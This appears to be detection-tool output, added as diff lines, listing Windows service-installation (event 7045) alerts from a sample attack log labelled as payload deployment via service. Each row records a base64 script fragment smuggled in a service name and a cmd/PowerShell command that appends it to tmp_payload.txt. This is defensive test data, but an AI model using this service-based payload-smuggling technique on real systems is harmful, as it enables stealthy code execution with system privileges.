+2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:08.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: V2ZW50IGxvZyBpbmZvDQogICAgICAgICAgICAkU3lzdGVtSW5mbyA9IEdldC1FdmVudExvZ0luZm8gJENvbXB1dGVyIFN5c3RlbSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:09.909 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRVBTID0gJFN5c3RlbUluZm8uQXZlcmFnZUV2ZW50cw0KICAgICAgICAgICAgJFN5c3RlbUZpcnN0RXZlbnRUaW1lID0gJFN5c3RlbUluZm8uU3RhcnRUaW1lDQogICAgICAgICAgICAkU3lzdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:11.349 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:12.786 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:14.233 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:15.677 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:17.117 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:19.634 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:21.088 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:22.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:23.979 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:18:25.446 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
